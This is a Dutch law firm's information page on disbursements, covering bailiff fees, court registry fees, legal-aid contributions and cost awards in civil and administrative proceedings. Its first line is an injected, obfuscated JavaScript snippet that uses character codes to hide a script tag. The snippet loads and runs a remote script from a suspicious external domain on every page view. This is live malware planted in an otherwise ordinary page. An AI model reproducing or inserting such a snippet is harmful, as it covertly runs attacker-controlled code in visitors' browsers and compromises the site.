Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,98,111,110,111,46,100,101,99,108,97,114,101,98,117,115,105,110,101,115,115,103,114,111,117,112,46,103,97,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Verschotten

Verschotten zijn kosten die anderen – bijvoorbeeld een deurwaarder, een gerecht, de Kamer van Koophandel of het Kadaster bij ons kantoor in rekening brengen voor diensten of producten in uw belang. Deze kosten zijn niet in het uurtarief opgenomen. Ze worden aan u doorbelast. Hieronder leest u korte toelichting op veel voorkomende verschotten.

Deurwaarderskosten

Een overzicht van de tarieven van deurwaarders vindt u op de website van de Koninklijke Beroepsorganisatie van Gerechtsdeurwaarders (KBVG).

Griffierecht

Als u partij bent in een procedure bij een rechtbank of een gerechtshof, dan bent u vaak griffierecht verschuldigd. Dit griffierecht wordt door het gerecht bij ons kantoor in rekening gebracht. Als de nota van het gerecht niet wordt betaald binnen de daarop vermelde termijn, zal dit gevolgen hebben voor het vervolg van de procedure.

Als u eiser of verzoeker bent en de nota is niet op tijd betaald, dan kan dit betekenen dat er geen inhoudelijke behandeling van uw zaak plaatsvindt en uw zaak van rechtswege eindigt. Ook in dat geval moet u het griffierecht nog steeds betalen. Als u in een procedure gedaagde of verweerder bent (uitgezonderd bij procedure bij de kantonrechter), dan zal de rechter waarschijnlijk geen rekening houden met uw verweer. Het gevolg is dat de rechter de vordering of het verzoek in beginsel zal toewijzen. Het griffierecht moet u ook dan (nog steeds) betalen.

De hoogte van het griffierecht is onder andere afhankelijk van het (financiële) belang, het soort zaak en de instantie bij welke geprocedeerd wordt. Zo zal een toegevoegde burger bij de kantonrechter een beperkt bedrag aan griffierecht verschuldigd zijn, maar een bedrijf bij het gerechtshof al gauw duizenden euro’s. Houdt u hier dan ook rekening mee zodat u niet voor verrassingen komt te staan.

Op de website rechtspraak.nl vindt u een overzicht van de door de gerechten gehanteerde griffierechten.

Ons kantoor zal de nota voor het griffierecht pas betalen nadat hetzelfde bedrag aan griffierecht door u is betaald aan ons kantoor. Het is dus in uw eigen belang de declaratie voor het griffierecht van ons kantoor op tijd te betalen.

Als u beschikt over een toevoeging, neemt de overheid de kosten van de procedure gedeeltelijk voor haar rekening; u heeft dan nog steeds externe kosten die u naast uw eigen bijdrage moet betalen, maar minder. Als u een inkomen rond het sociaal minimum heeft, kunt u in sommige gevallen deze kosten via de bijzondere bijstand vergoed krijgen. Informeert u bij uw gemeente. Als uw toevoeging achteraf, om wat voor reden ook, wordt ingetrokken, dan moet u het door de overheid voor u betaalde deel van de kosten vergoeden aan de overheid.

Kostenvergoeding

Als u partij bent in een civiele of bestuursrechtelijke procedure, dan kunt u, als u in het gelijk wordt gesteld, een deel van de kosten vergoed krijgen. De ‘proceskosten’ worden in de meeste soorten zaken begroot volgens een puntenstelsel dat losstaat van uw werkelijke kosten. Mocht u onverhoopt de verliezende partij zijn in een civiele procedure, dan moet u er rekening mee houden dat u de ‘proceskosten’ van uw wederpartij moet vergoeden. Of u wel of niet over een toevoeging beschikt, speelt geen rol bij voor de hoogte van de proceskosten waarin u kunt worden veroordeeld. In een bestuursrechtelijke procedure hoeft u, als u verliest, meestal geen proceskosten te betalen.